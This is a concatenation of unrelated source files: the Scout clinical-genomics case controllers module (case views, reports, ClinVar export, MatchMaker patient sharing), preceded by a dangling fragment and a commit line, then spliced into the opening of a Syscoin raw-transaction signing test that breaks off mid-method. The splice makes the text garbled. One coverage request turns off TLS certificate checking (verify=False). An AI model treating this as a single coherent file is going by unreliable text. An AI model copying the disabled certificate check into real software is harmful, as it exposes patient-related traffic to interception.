                json_resp = matchmaker_request(url=url, token=mme_token, method='POST')
                resp_obj = {
                    'server' : node,
                    'patient_id' : patient,
                    'results' : json_resp.get('results'),
                    'status_code' : json_resp.get('status_code'),
                    'message' : json_resp.get('message') # None if request was successful
                }
                server_responses.append(resp_obj)
    return server_responses
Update scout/server/blueprints/cases/controllers.py
Co-Authored-By: Daniel Nilsson <5ebb189bec086108d5ed5e608cd0d69010652678@gmail.com>
# -*- coding: utf-8 -*-
import os
import itertools
import requests
import datetime
import logging
from bs4 import BeautifulSoup
from xlsxwriter import Workbook
from flask import url_for, current_app
from flask_mail import Message
import query_phenomizer
from flask_login import current_user
from scout.constants import (CASE_STATUSES, PHENOTYPE_GROUPS, COHORT_TAGS, SEX_MAP, PHENOTYPE_MAP,
CANCER_PHENOTYPE_MAP, VERBS_MAP, MT_EXPORT_HEADER)
from scout.constants.variant_tags import MANUAL_RANK_OPTIONS, DISMISS_VARIANT_OPTIONS, GENETIC_MODELS
from scout.export.variant import export_mt_variants
from scout.server.utils import institute_and_case, user_institutes
from scout.parse.clinvar import clinvar_submission_header, clinvar_submission_lines
from scout.server.blueprints.variant.controllers import variant as variant_decorator
from scout.parse.matchmaker import hpo_terms, omim_terms, genomic_features, parse_matches
from scout.utils.matchmaker import matchmaker_request
from scout.server.blueprints.variant.utils import predictions
from scout.server.blueprints.genes.controllers import gene
LOG = logging.getLogger(__name__)

# CSS/background class shown for a case status (presumably consumed by the
# case templates -- confirm against the views)
STATUS_MAP = {'solved': 'bg-success', 'archived': 'bg-warning'}

# Human-readable display name for each case analysis track
TRACKS = {
    'rare': 'Rare Disease',
    'cancer': 'Cancer',
}
def cases(store, case_query, limit=100):
    """Preprocess case objects.

    Add the necessary information to display the 'cases' view

    Args:
        store(adapter.MongoAdapter)
        case_query(pymongo.Cursor)
        limit(int): Maximum number of cases to display

    Returns:
        data(dict): includes the cases, how many there are and the limit.
    """
    # bucket cases per status so each status can be rendered separately
    case_groups = {status: [] for status in CASE_STATUSES}
    # nr_cases tracks how many cases were actually consumed from the cursor
    nr_cases = 0
    for nr_cases, case_obj in enumerate(case_query.limit(limit),1):
        analysis_types = set(ind['analysis_type'] for ind in case_obj['individuals'])
        LOG.debug("Analysis types found in %s: %s", case_obj['_id'], ','.join(analysis_types))
        if len(analysis_types) > 1:
            # individuals were analysed with different methods: show as 'mixed'
            LOG.debug("Set analysis types to {'mixed'}")
            analysis_types = set(['mixed'])
        case_obj['analysis_types'] = list(analysis_types)
        case_obj['assignees'] = [store.user(user_email) for user_email in
                                 case_obj.get('assignees', [])]
        # a case with previous analyses on record counts as a rerun
        case_obj['is_rerun'] = len(case_obj.get('analyses', [])) > 0
        case_obj['clinvar_variants'] = store.case_to_clinVars(case_obj['_id'])
        case_obj['display_track'] = TRACKS[case_obj.get('track', 'rare')]
        case_groups[case_obj['status']].append(case_obj)
    data = {
        'cases': [(status, case_groups[status]) for status in CASE_STATUSES],
        'found_cases': nr_cases,
        'limit': limit,
    }
    return data
def case(store, institute_obj, case_obj):
    """Preprocess a single case.

    Prepare the case to be displayed in the case view.

    Args:
        store(adapter.MongoAdapter)
        institute_obj(models.Institute)
        case_obj(models.Case)

    Returns:
        data(dict): includes the cases, how many there are and the limit.
    """
    # Convert individual information to more readable format
    case_obj['individual_ids'] = []
    for individual in case_obj['individuals']:
        try:
            sex = int(individual.get('sex', 0))
        except ValueError as err:
            # unparsable sex falls back to 0 ("unknown")
            sex = 0
        individual['sex_human'] = SEX_MAP[sex]
        # cancer-track cases use a different phenotype vocabulary
        pheno_map = PHENOTYPE_MAP
        if case_obj.get('track', 'rare') == 'cancer':
            pheno_map = CANCER_PHENOTYPE_MAP
        individual['phenotype_human'] = pheno_map.get(individual['phenotype'])
        case_obj['individual_ids'].append(individual['individual_id'])

    case_obj['assignees'] = [store.user(user_email) for user_email in
                             case_obj.get('assignees', [])]

    # Fetch the variant objects for suspects and causatives; fall back to the
    # raw id when the variant is no longer in the database
    suspects = [store.variant(variant_id) or variant_id for variant_id in
                case_obj.get('suspects', [])]
    causatives = [store.variant(variant_id) or variant_id for variant_id in
                  case_obj.get('causatives', [])]

    # check for partial causatives and associated phenotypes
    partial_causatives = []
    if case_obj.get('partial_causatives'):
        for var_id, values in case_obj['partial_causatives'].items():
            causative_obj = {
                'variant' : store.variant(var_id) or var_id,
                'omim_terms' : values.get('diagnosis_phenotypes'),
                'hpo_terms' : values.get('phenotype_terms')
            }
            partial_causatives.append(causative_obj)

    # Set of all unique genes in the default gene panels
    distinct_genes = set()
    case_obj['panel_names'] = []
    for panel_info in case_obj.get('panels', []):
        if not panel_info.get('is_default'):
            continue
        panel_obj = store.gene_panel(panel_info['panel_name'], version=panel_info.get('version'))
        distinct_genes.update([gene['hgnc_id'] for gene in panel_obj.get('genes', [])])
        full_name = "{} ({})".format(panel_obj['display_name'], panel_obj['version'])
        case_obj['panel_names'].append(full_name)
    case_obj['default_genes'] = list(distinct_genes)

    for hpo_term in itertools.chain(case_obj.get('phenotype_groups', []),
                                    case_obj.get('phenotype_terms', [])):
        hpo_term['hpo_link'] = ("http://hpo.jax.org/app/browse/term/{}"
                                .format(hpo_term['phenotype_id']))

    # BUGFIX: default to '' (as the SV branch below already does) so a missing
    # RANK_MODEL_LINK_PREFIX config entry cannot raise a TypeError when
    # concatenated with the version string
    rank_model_link_prefix = current_app.config.get('RANK_MODEL_LINK_PREFIX', '')
    if case_obj.get('rank_model_version'):
        rank_model_link_postfix = current_app.config.get('RANK_MODEL_LINK_POSTFIX','')
        case_obj['rank_model_link'] = str(rank_model_link_prefix +
                                          case_obj['rank_model_version'] + rank_model_link_postfix)

    sv_rank_model_link_prefix = current_app.config.get('SV_RANK_MODEL_LINK_PREFIX','')
    if case_obj.get('sv_rank_model_version'):
        sv_rank_model_link_postfix = current_app.config.get('SV_RANK_MODEL_LINK_POSTFIX','')
        case_obj['sv_rank_model_link'] = str(sv_rank_model_link_prefix +
                                             case_obj['sv_rank_model_version'] + sv_rank_model_link_postfix)

    # other collaborators than the owner of the case
    o_collaborators = []
    for collab_id in case_obj.get('collaborators',[]):
        if collab_id != case_obj['owner'] and store.institute(collab_id):
            o_collaborators.append(store.institute(collab_id))
    case_obj['o_collaborators'] = [(collab_obj['_id'], collab_obj['display_name']) for
                                   collab_obj in o_collaborators]

    # institutes that are not yet collaborators on this case
    # (presumably candidates for sharing; 'cust000' is excluded -- confirm why)
    collab_ids = [(collab['_id'], collab['display_name']) for collab in store.institutes() if
                  (collab['_id'] not in ('cust000', institute_obj['_id'])) and
                  (collab['_id'] not in case_obj['collaborators'])]

    events = list(store.events(institute_obj, case=case_obj))
    for event in events:
        event['verb'] = VERBS_MAP[event['verb']]

    case_obj['clinvar_variants'] = store.case_to_clinVars(case_obj['_id'])

    # if updated_at is a list, set it to the last update datetime
    if case_obj.get('updated_at') and isinstance(case_obj['updated_at'], list):
        case_obj['updated_at'] = max(case_obj['updated_at'])

    # Phenotype groups can be specific for an institute, there are some default groups
    pheno_groups = institute_obj.get('phenotype_groups') or PHENOTYPE_GROUPS

    data = {
        'status_class': STATUS_MAP.get(case_obj['status']),
        'other_causatives': store.check_causatives(case_obj=case_obj),
        'comments': store.events(institute_obj, case=case_obj, comments=True),
        'hpo_groups': pheno_groups,
        'events': events,
        'suspects': suspects,
        'causatives': causatives,
        'partial_causatives' : partial_causatives,
        'collaborators': collab_ids,
        'cohort_tags': COHORT_TAGS,
    }
    return data
def case_report_content(store, institute_obj, case_obj):
    """Gather contents to be visualized in a case report

    Args:
        store(adapter.MongoAdapter)
        institute_obj(models.Institute)
        case_obj(models.Case)

    Returns:
        data(dict)
    """
    # map from report section key to the variant-level keyword that marks
    # membership in that section
    variant_types = {
        'causatives_detailed': 'causatives',
        'suspects_detailed': 'suspects',
        'classified_detailed': 'acmg_classification',
        'tagged_detailed': 'manual_rank',
        'dismissed_detailed': 'dismiss_variant',
        'commented_detailed': 'is_commented',
    }
    # NOTE: data aliases case_obj -- the case object is mutated in place below
    data = case_obj

    for individual in data['individuals']:
        try:
            sex = int(individual.get('sex', 0))
        except ValueError as err:
            # unparsable sex falls back to 0 ("unknown")
            sex = 0
        individual['sex_human'] = SEX_MAP[sex]
        individual['phenotype_human'] = PHENOTYPE_MAP.get(individual['phenotype'])

    # Add the case comments
    data['comments'] = store.events(institute_obj, case=case_obj, comments=True)

    data['manual_rank_options'] = MANUAL_RANK_OPTIONS
    data['dismissed_options'] = DISMISS_VARIANT_OPTIONS
    data['genetic_models'] = dict(GENETIC_MODELS)
    data['report_created_at'] = datetime.datetime.now().strftime("%Y-%m-%d %H:%M")

    evaluated_variants = {vt:[] for vt in variant_types}
    # We collect all causatives and suspected variants
    # These are handled separately since they are on case level
    for var_type in ['causatives', 'suspects']:
        # These include references to variants
        vt = '_'.join([var_type, 'detailed'])
        for var_id in case_obj.get(var_type,[]):
            variant_obj = store.variant(var_id)
            if not variant_obj:
                continue
            # If the variant exists we add it to the evaluated variants
            evaluated_variants[vt].append(variant_obj)

    ## get variants for this case that are either classified, commented, tagged or dismissed.
    for var_obj in store.evaluated_variants(case_id=case_obj['_id']):
        # Check which category it belongs to
        for vt in variant_types:
            keyword = variant_types[vt]
            # When found we add it to the category
            # Each variant can belong to multiple categories
            if keyword not in var_obj:
                continue
            evaluated_variants[vt].append(var_obj)

    for var_type in evaluated_variants:
        decorated_variants = []
        for var_obj in evaluated_variants[var_type]:
            # We decorate the variant with some extra information
            decorated_info = variant_decorator(
                store=store,
                institute_id=institute_obj['_id'],
                case_name=case_obj['display_name'],
                variant_id=None,
                variant_obj=var_obj,
                add_case=False,
                add_other=False,
                get_overlapping=False,
                add_compounds=False,
                variant_type=var_obj['category'],
                institute_obj=institute_obj,
                case_obj=case_obj,
            )
            decorated_variants.append(decorated_info['variant'])
        # Add the decorated variants to the case
        data[var_type] = decorated_variants

    return data
def coverage_report_contents(store, institute_obj, case_obj, base_url):
    """Post a request to chanjo-report and capture the body of the returned
    response, to be included in the case report.

    Args:
        store(adapter.MongoAdapter)
        institute_obj(models.Institute)
        case_obj(models.Case)
        base_url(str): base url of server

    Returns:
        coverage_data(str): string rendering of the content between
            <body></body> tags of a coverage report
    """
    request_data = {}
    # extract sample ids from case_obj and add them to the post request object
    request_data['sample_id'] = [ind['individual_id'] for ind in case_obj['individuals']]

    # extract default panel names and default genes from case_obj and add them
    # to the post request object
    distinct_genes = set()
    panel_names = []
    for panel_info in case_obj.get('panels', []):
        if panel_info.get('is_default') is False:
            continue
        panel_obj = store.gene_panel(panel_info['panel_name'], version=panel_info.get('version'))
        distinct_genes.update([gene['hgnc_id'] for gene in panel_obj.get('genes', [])])
        full_name = "{} ({})".format(panel_obj['display_name'], panel_obj['version'])
        panel_names.append(full_name)
    # BUGFIX: separator was ' ,' (space before the comma); use ', '
    panel_names = ', '.join(panel_names)

    request_data['gene_ids'] = ','.join([str(gene_id) for gene_id in list(distinct_genes)])
    request_data['panel_name'] = panel_names
    request_data['request_sent'] = datetime.datetime.now()

    # add institute-specific cutoff level to the post request object
    request_data['level'] = institute_obj.get('coverage_cutoff', 15)

    # send POST request to chanjo-report
    # NOTE(review): certificate verification is deliberately disabled here;
    # confirm this is acceptable for the deployment environment
    resp = requests.post(base_url + 'reports/report', data=request_data, verify=False)

    # parse response content; name the parser explicitly to silence the
    # BeautifulSoup "no parser explicitly specified" warning and get
    # deterministic behaviour across environments
    soup = BeautifulSoup(resp.text, 'html.parser')
    # remove links in the printed version of coverage report
    for tag in soup.find_all('a'):
        tag.replaceWith('')
    # extract body content using BeautifulSoup
    coverage_data = ''.join(['%s' % x for x in soup.body.contents])
    return coverage_data
def clinvar_submissions(store, user_id, institute_id):
    """Return all Clinvar submissions for the given user and institute."""
    return list(store.clinvar_submissions(user_id, institute_id))
def clinvar_header(submission_objs, csv_type):
    """Delegate to the clinvar parser: extract the fields required in the
    csv header from the clinvar submission objects."""
    return clinvar_submission_header(submission_objs, csv_type)
def clinvar_lines(clinvar_objects, clinvar_header):
    """Delegate to the clinvar parser: extract the csv lines from the
    clinvar submission objects, ordered according to the given header."""
    return clinvar_submission_lines(clinvar_objects, clinvar_header)
def mt_excel_files(store, case_obj, temp_excel_dir):
    """Collect MT variants for a case and write one excel report per individual.

    Args:
        store(adapter.MongoAdapter)
        case_obj(models.Case)
        temp_excel_dir(os.Path): folder where the temp excel files are written to

    Returns:
        written_files(int): the number of files written to temp_excel_dir
    """
    date_str = datetime.datetime.now().strftime('%Y-%m-%d')
    # all MT variants of the case, sorted by position (nr_of_variants=-1 -> no limit)
    mt_variants = list(store.variants(case_id=case_obj['_id'], query={'chrom': 'MT'},
                                      nr_of_variants=-1, sort_key='position'))
    written_files = 0
    for individual in case_obj.get('individuals'):
        ind_id = individual['individual_id']
        ind_display = individual['display_name']
        sample_lines = export_mt_variants(variants=mt_variants, sample_id=ind_id)
        # one workbook per individual, named <case>.<sample>.<date>.xlsx
        doc_name = '.'.join([case_obj['display_name'], ind_display, date_str]) + '.xlsx'
        doc_path = os.path.join(temp_excel_dir, doc_name)
        workbook = Workbook(doc_path)
        sheet = workbook.add_worksheet()
        # header row first (row 0)
        for col, field in enumerate(MT_EXPORT_HEADER):
            sheet.write(0, col, field)
        # then one row per variant line, starting at row 1
        for row, line in enumerate(sample_lines, 1):
            for col, field in enumerate(line):
                sheet.write(row, col, field)
        workbook.close()
        if os.path.exists(doc_path):
            written_files += 1
    return written_files
def update_synopsis(store, institute_obj, case_obj, user_obj, new_synopsis):
    """Update the free-text synopsis of a case.

    An update event is created only when the synopsis actually changed.
    """
    if case_obj['synopsis'] == new_synopsis:
        # nothing changed; do not create a spurious event
        return
    link = url_for('cases.case', institute_id=institute_obj['_id'],
                   case_name=case_obj['display_name'])
    store.update_synopsis(institute_obj, case_obj, user_obj, link,
                          content=new_synopsis)
def hpo_diseases(username, password, hpo_ids, p_value_treshold=1):
    """Return the Phenomizer diseases matching a set of HPO terms.

    Args:
        username (str): username to use for phenomizer connection
        password (str): password to use for phenomizer connection
        hpo_ids (list): HPO term ids to query with
        p_value_treshold (float): keep only results whose p-value is <= this cutoff

    Returns:
        a list of dictionaries on the form
        {
            'p_value': float,
            'disease_source': str,
            'disease_nr': int,
            'gene_symbols': list(str),
            'description': str,
            'raw_line': str
        }
        or None when the phenomizer query fails
    """
    try:
        # query_phenomizer signals failure by raising SystemExit
        query_result = query_phenomizer.query(username, password, *hpo_ids)
        return [res for res in query_result
                if res['p_value'] <= p_value_treshold]
    except SystemExit:
        return None
def rerun(store, mail, current_user, institute_id, case_name, sender, recipient):
    """Request a case rerun and notify the responsible party by email.

    Args:
        store(adapter.MongoAdapter)
        mail(flask_mail.Mail): mail extension used to send the message
        current_user: the logged-in user requesting the rerun
        institute_id(str)
        case_name(str)
        sender(str): email address used as message sender
        recipient(str): email address the request is sent to; if empty,
            no email is sent and an error is logged

    Side effects:
        Creates a rerun-request event and sends a notification email.
    """
    institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
    user_obj = store.user(current_user.email)
    link = url_for('cases.case', institute_id=institute_id, case_name=case_name)
    store.request_rerun(institute_obj, case_obj, user_obj, link)
    # this should send a JSON document to the SuSy API in the future
    # BUGFIX: previously user_obj['name'].encode() was formatted into the
    # message, which renders as b'...' under Python 3; use the str directly.
    html = """
        <p>{institute}: {case} ({case_id})</p>
        <p>Re-run requested by: {name}</p>
    """.format(institute=institute_obj['display_name'],
               case=case_obj['display_name'], case_id=case_obj['_id'],
               name=user_obj['name'])
    # compose and send the email message
    msg = Message(subject=("SCOUT: request RERUN for {}"
                           .format(case_obj['display_name'])),
                  html=html, sender=sender, recipients=[recipient],
                  # cc the sender of the email for confirmation
                  cc=[user_obj['email']])
    if recipient:
        mail.send(msg)
    else:
        LOG.error("Cannot send rerun message: no recipient defined in config.")
def update_default_panels(store, current_user, institute_id, case_name, panel_ids):
    """Set the default gene panels for a case.

    Args:
        store(adapter.MongoAdapter)
        current_user: the logged-in user
        institute_id(str)
        case_name(str)
        panel_ids(list): ids of the panels to set as default
    """
    institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
    user_obj = store.user(current_user.email)
    link = url_for('cases.case', institute_id=institute_id, case_name=case_name)
    # resolve each panel id to its panel object before updating the case
    panel_objs = [store.panel(pid) for pid in panel_ids]
    store.update_default_panels(institute_obj, case_obj, user_obj, link, panel_objs)
def update_clinical_filter_hpo(store, current_user, institute_id, case_name, hpo_clinical_filter):
    """Toggle the use of the HPO clinical filter for a case.

    Args:
        store(adapter.MongoAdapter)
        current_user: the logged-in user
        institute_id(str)
        case_name(str)
        hpo_clinical_filter: new value for the HPO clinical filter setting
    """
    institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
    user_obj = store.user(current_user.email)
    link = url_for('cases.case', institute_id=institute_id, case_name=case_name)
    store.update_clinical_filter_hpo(institute_obj, case_obj, user_obj, link,
                                     hpo_clinical_filter)
def vcf2cytosure(store, institute_id, case_name, individual_id):
    """Return the vcf2cytosure CGH data for one individual of a case.

    Args:
        store(adapter.MongoAdapter)
        institute_id(str)
        case_name(str)
        individual_id(str)

    Returns:
        tuple: (display name of the individual, its 'vcf2cytosure' value)

    Raises:
        ValueError: if no individual with individual_id exists in the case.
            (Previously this situation crashed with an UnboundLocalError.)
    """
    institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
    individual_obj = next(
        (ind for ind in case_obj['individuals']
         if ind['individual_id'] == individual_id),
        None)
    if individual_obj is None:
        raise ValueError("Individual {} not found in case {}".format(
            individual_id, case_name))
    return (individual_obj['display_name'], individual_obj['vcf2cytosure'])
def gene_variants(store, variants_query, institute_id, page=1, per_page=50):
    """Pre-process a list of variants for the gene variants view.

    Args:
        store(adapter.MongoAdapter)
        variants_query: a mongo cursor over variant documents
        institute_id(str)
        page(int): 1-based page number
        per_page(int): number of variants per page

    Returns:
        dict: {'variants': list of processed variant objects,
               'more_variants': True if more pages are available}
    """
    # We need to call variants_collection.count_documents here
    variant_count = variants_query.count()
    skip_count = per_page * max(page - 1, 0)
    more_variants = variant_count > (skip_count + per_page)
    variant_res = variants_query.skip(skip_count).limit(per_page)
    my_institutes = list(inst['_id'] for inst in user_institutes(store, current_user))
    variants = []
    for variant_obj in variant_res:
        # hide other institutes for now
        if variant_obj['institute'] not in my_institutes:
            LOG.warning("Institute {} not allowed.".format(variant_obj['institute']))
            continue
        # Populate variant case_display_name
        variant_case_obj = store.case(case_id=variant_obj['case_id'])
        if not variant_case_obj:
            # A variant with missing case was encountered
            continue
        variant_obj['case_display_name'] = variant_case_obj.get('display_name')
        genome_build = variant_case_obj.get('genome_build', '37')
        if genome_build not in ['37', '38']:
            genome_build = '37'
        # Update the HGNC symbols if they are not set
        variant_genes = variant_obj.get('genes')
        if variant_genes is not None:
            for gene_obj in variant_genes:
                # If there is no hgnc id there is nothing we can do
                if not gene_obj['hgnc_id']:
                    continue
                # Else we collect the gene object and check the id
                if gene_obj.get('hgnc_symbol') is None or gene_obj.get('description') is None:
                    hgnc_gene = store.hgnc_gene(gene_obj['hgnc_id'], build=genome_build)
                    if not hgnc_gene:
                        continue
                    gene_obj['hgnc_symbol'] = hgnc_gene['hgnc_symbol']
                    gene_obj['description'] = hgnc_gene['description']
            # Populate variant HGVS and predictions
            gene_ids = []
            gene_symbols = []
            hgvs_c = []
            hgvs_p = []
            for gene_obj in variant_genes:
                hgnc_id = gene_obj['hgnc_id']
                gene_ids.append(hgnc_id)
                gene_symbols.append(gene(store, hgnc_id)['symbol'])
                # gather HGVS info from the canonical transcript, if any
                hgvs_nucleotide = '-'
                # BUGFIX: hgvs_protein was previously left unassigned when no
                # canonical transcript exists, raising UnboundLocalError below
                hgvs_protein = '-'
                # BUGFIX: guard against a missing/None 'transcripts' entry
                for transcript_obj in gene_obj.get('transcripts') or []:
                    if transcript_obj.get('is_canonical') is True:
                        hgvs_nucleotide = str(transcript_obj.get('coding_sequence_name'))
                        hgvs_protein = str(transcript_obj.get('protein_sequence_name'))
                hgvs_c.append(hgvs_nucleotide)
                hgvs_p.append(hgvs_protein)
            if len(gene_symbols) == 1:
                # prefer the protein change, then the cDNA change, else '-'
                if hgvs_p[0] != "None":
                    variant_obj['hgvs'] = hgvs_p[0]
                elif hgvs_c[0] != "None":
                    variant_obj['hgvs'] = hgvs_c[0]
                else:
                    variant_obj['hgvs'] = "-"
            # populate variant predictions for display
            variant_obj.update(predictions(variant_genes))
        variants.append(variant_obj)
    return {
        'variants': variants,
        'more_variants': more_variants,
    }
def multiqc(store, institute_id, case_name):
    """Return the data needed to display the MultiQC report for a case.

    Args:
        store(adapter.MongoAdapter)
        institute_id(str)
        case_name(str)

    Returns:
        dict with the institute and case objects
    """
    institute_obj, case_obj = institute_and_case(store, institute_id, case_name)
    return {'institute': institute_obj, 'case': case_obj}
def get_sanger_unevaluated(store, institute_id, user_id):
    """Get all variants for an institute having Sanger validations ordered but still not evaluated

    Args:
        store(scout.adapter.MongoAdapter)
        institute_id(str)
        user_id(str)

    Returns:
        unevaluated: a list like
            [ {'case1': [varID_1, .., varID_n]}, {'case2': [varID_1, .., varID_n]} ]
            where keys are case display names and values are lists of variant
            ids with Sanger ordered but not yet validated
    """
    # Variant ids with Sanger ordered, grouped by case, come from the 'event'
    # collection: much faster than scanning every variant of the institute.
    unevaluated = []
    for grouped in store.sanger_ordered(institute_id, user_id):
        case_id = grouped['_id']
        case_obj = store.case(case_id=case_id)
        if not case_obj:  # the case might have been removed
            continue
        case_display_name = case_obj.get('display_name')
        pending = []
        for var_id in grouped['vars']:
            variant_obj = store.variant(document_id=var_id, case_id=case_id)
            if variant_obj is None:
                continue
            # double-check that Sanger is still ordered (not canceled)
            sanger_flag = variant_obj.get('sanger_ordered')
            if sanger_flag is None or sanger_flag is False:
                continue
            # keep only variants that were not evaluated yet
            if variant_obj.get('validation', 'not_evaluated') in ['True positive', 'False positive']:
                continue
            pending.append(variant_obj['_id'])
        # report the case only when at least one validation is pending
        if pending:
            unevaluated.append({case_display_name: pending})
    return unevaluated
def mme_add(store, user_obj, case_obj, add_gender, add_features, add_disorders, genes_only,
            mme_base_url, mme_accepts, mme_token):
    """Add a patient to MatchMaker server

    Args:
        store(adapter.MongoAdapter)
        user_obj(dict): a scout user object (to be added as matchmaker contact)
        case_obj(dict): a scout case object
        add_gender(bool): if True case gender will be included in matchmaker
        add_features(bool): if True HPO features will be included in matchmaker
        add_disorders(bool): if True OMIM diagnoses will be included in matchmaker
        genes_only(bool): if True only genes and not variants will be shared
        mme_base_url(str): base url of the MME server
        mme_accepts(str): request content accepted by MME server
        mme_token(str): auth token of the MME server

    Returns:
        submitted_info(dict): info submitted to MatchMaker and its responses,
            or an error string when connection parameters are missing
    """
    if not mme_base_url or not mme_accepts or not mme_token:
        return 'Please check that Matchmaker connection parameters are valid'
    add_url = ''.join([mme_base_url, '/patient/add'])
    # contact attached to every submitted patient
    contact_info = {
        'name': user_obj['name'],
        'href': ''.join(['mailto:', user_obj['email']]),
        'institution': 'Scout software user, Science For Life Laboratory, Stockholm, Sweden'
    }
    # HPO terms and OMIM diagnoses to share, when requested
    features = hpo_terms(case_obj) if add_features else []
    disorders = omim_terms(case_obj) if add_disorders else []
    g_features = []
    submitted_info = {
        'contact': contact_info,
        'sex': add_gender,
        'features': features,
        'disorders': disorders,
        'genes_only': genes_only,
        'patient_id': []
    }
    # send a POST request and collect the response for each affected individual
    server_responses = []
    for individual in case_obj.get('individuals'):
        if individual['phenotype'] not in [2, 'affected']:
            # share only affected individuals
            continue
        patient = {
            'contact': contact_info,
            'id': '.'.join([case_obj['_id'], individual.get('individual_id')]),  # required field for MME
            'label': '.'.join([case_obj['display_name'], individual.get('display_name')]),
            'features': features,
            'disorders': disorders
        }
        if add_gender:
            patient['sex'] = 'MALE' if individual['sex'] == '1' else 'FEMALE'
        if case_obj.get('suspects'):
            g_features = genomic_features(store, case_obj, individual.get('display_name'),
                                          genes_only)
        patient['genomicFeatures'] = g_features
        # send the add request to the server and capture its response
        resp = matchmaker_request(url=add_url, token=mme_token, method='POST',
                                  content_type=mme_accepts, accept='application/json',
                                  data={'patient': patient})
        server_responses.append({
            'patient': patient,
            'message': resp.get('message'),
            'status_code': resp.get('status_code')
        })
    submitted_info['server_responses'] = server_responses
    return submitted_info
def mme_delete(case_obj, mme_base_url, mme_token):
    """Delete all affected samples for a case from MatchMaker

    Args:
        case_obj(dict): a scout case object
        mme_base_url(str): base url of the MME server
        mme_token(str): auth token of the MME server

    Returns:
        server_responses(list): one object per deleted patient:
            {
                'patient_id': patient_id,
                'message': server_message,
                'status_code': server_status_code
            }
        or an error string when connection parameters are missing
    """
    if not mme_base_url or not mme_token:
        return 'Please check that Matchmaker connection parameters are valid'
    server_responses = []
    # issue one DELETE request per patient submitted for the case
    for patient in case_obj['mme_submission']['patients']:
        pat_id = patient['id']
        delete_url = ''.join([mme_base_url, '/patient/delete/', pat_id])
        resp = matchmaker_request(url=delete_url, token=mme_token, method='DELETE')
        server_responses.append({
            'patient_id': pat_id,
            'message': resp.get('message'),
            'status_code': resp.get('status_code')
        })
    return server_responses
def mme_matches(case_obj, institute_obj, mme_base_url, mme_token):
    """Show Matchmaker submission data for a sample and eventual matches.

    Args:
        case_obj(dict): a scout case object
        institute_obj(dict): an institute object
        mme_base_url(str): base url of the MME server
        mme_token(str): auth token of the MME server

    Returns:
        data(dict): data to display in the html template, or None when the
            case has no matchmaker submission
    """
    if not case_obj.get('mme_submission'):
        return None
    data = {
        'institute': institute_obj,
        'case': case_obj,
        'server_errors': []
    }
    matches = {}
    # collect matches from the MatchMaker server for every submitted patient
    for patient in case_obj['mme_submission']['patients']:
        pat_id = patient['id']
        matches[pat_id] = None
        match_url = ''.join([mme_base_url, '/matches/', pat_id])
        server_resp = matchmaker_request(url=match_url, token=mme_token, method='GET')
        if 'status_code' not in server_resp:
            # the server answered with an error message instead of a response
            LOG.warning('Server returned error message: {}'.format(server_resp['message']))
            data['server_errors'].append(server_resp['message'])
            continue
        # valid response: a list of match objects sorted by descending date
        pat_matches = []
        if server_resp.get('matches'):
            pat_matches = parse_matches(pat_id, server_resp['matches'])
        matches[pat_id] = pat_matches
    data['matches'] = matches
    return data
def mme_match(case_obj, match_type, mme_base_url, mme_token, nodes=None, mme_accepts=None):
    """Initiate a MatchMaker match against either other Scout patients or external nodes

    Args:
        case_obj(dict): a scout case object already submitted to MME
        match_type(str): 'internal', 'external', or the id of a specific external node
        mme_base_url(str): base url of the MME server
        mme_token(str): auth token of the MME server
        nodes(list): connected MME node objects (used for external matches)
        mme_accepts(str): request content accepted by MME server (only for internal matches)

    Returns:
        server_responses(list): one response object per match request sent
    """
    server_responses = []
    query_patients = case_obj['mme_submission']['patients']
    if match_type == 'internal':
        # internal matching posts the full patient document to the local node
        match_url = ''.join([mme_base_url, '/match'])
        for patient in query_patients:
            json_resp = matchmaker_request(url=match_url, token=mme_token, method='POST',
                                           content_type=mme_accepts, accept=mme_accepts,
                                           data={'patient': patient})
            server_responses.append({
                'server': 'Local MatchMaker node',
                'patient_id': patient['id'],
                'results': json_resp.get('results'),
                'status_code': json_resp.get('status_code'),
                'message': json_resp.get('message')  # None if request was successful
            })
        return server_responses
    # external matching requires only the patient ids
    patient_ids = [patient['id'] for patient in query_patients]
    node_ids = [node['id'] for node in nodes]
    if match_type in node_ids:
        # match against one specific external node only
        node_ids = [match_type]
    # match every affected patient against every selected node
    for pat_id in patient_ids:
        for node in node_ids:
            match_url = ''.join([mme_base_url, '/match/external/', pat_id, '?node=', node])
            json_resp = matchmaker_request(url=match_url, token=mme_token, method='POST')
            server_responses.append({
                'server': node,
                'patient_id': pat_id,
                'results': json_resp.get('results'),
                'status_code': json_resp.get('status_code'),
                'message': json_resp.get('message')  # None if request was successful
            })
    return server_responses
|
#!/usr/bin/env python3
# Copyright (c) 2015-2019 The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
"""Test transaction signing using the signrawtransaction* RPCs."""
from test_framework.address import check_script, script_to_p2sh
from test_framework.test_framework import SyscoinTestFramework
from test_framework.util import assert_equal, assert_raises_rpc_error, find_vout_for_address, hex_str_to_bytes
from test_framework.messages import sha256
from test_framework.script import CScript, OP_0, OP_CHECKSIG
from decimal import Decimal
class SignRawTransactionsTest(SyscoinTestFramework):
    """Functional tests for the signrawtransactionwithkey/-wallet RPCs."""

    def set_test_params(self):
        # Two wallet-enabled nodes on a fresh chain.
        self.setup_clean_chain = True
        self.num_nodes = 2

    def skip_test_if_missing_module(self):
        # Every sub-test relies on wallet RPCs.
        self.skip_if_no_wallet()

    def successful_signing_test(self):
        """Create and sign a valid raw transaction with one input.

        Expected results:

        1) The transaction has a complete set of signatures
        2) No script verification error occurred"""
        privKeys = ['cUeKHd5orzT3mz8P9pxyREHfsWtVfgsfDjiZZBcjUBAaGk1BTj7N', 'cVKpPfVKSJxKqVpE9awvXNWuLHCa5j5tiE7K6zbUSptFpTEtiFrA']
        inputs = [
            # Valid pay-to-pubkey scripts
            {'txid': '9b907ef1e3c26fc71fe4a4b3580bc75264112f95050014157059c736f0202e71', 'vout': 0,
             'scriptPubKey': '76a91460baa0f494b38ce3c940dea67f3804dc52d1fb9488ac'},
            {'txid': '83a4f6a6b73660e13ee6cb3c6063fa3759c50c9b7521d0536022961898f4fb02', 'vout': 0,
             'scriptPubKey': '76a914669b857c03a5ed269d5d85a1ffac9ed5d663072788ac'},
        ]
        outputs = {'mpLQjfK79b7CCV4VMJWEWAj5Mpx8Up5zxB': 0.1}
        rawTx = self.nodes[0].createrawtransaction(inputs, outputs)
        rawTxSigned = self.nodes[0].signrawtransactionwithkey(rawTx, privKeys, inputs)
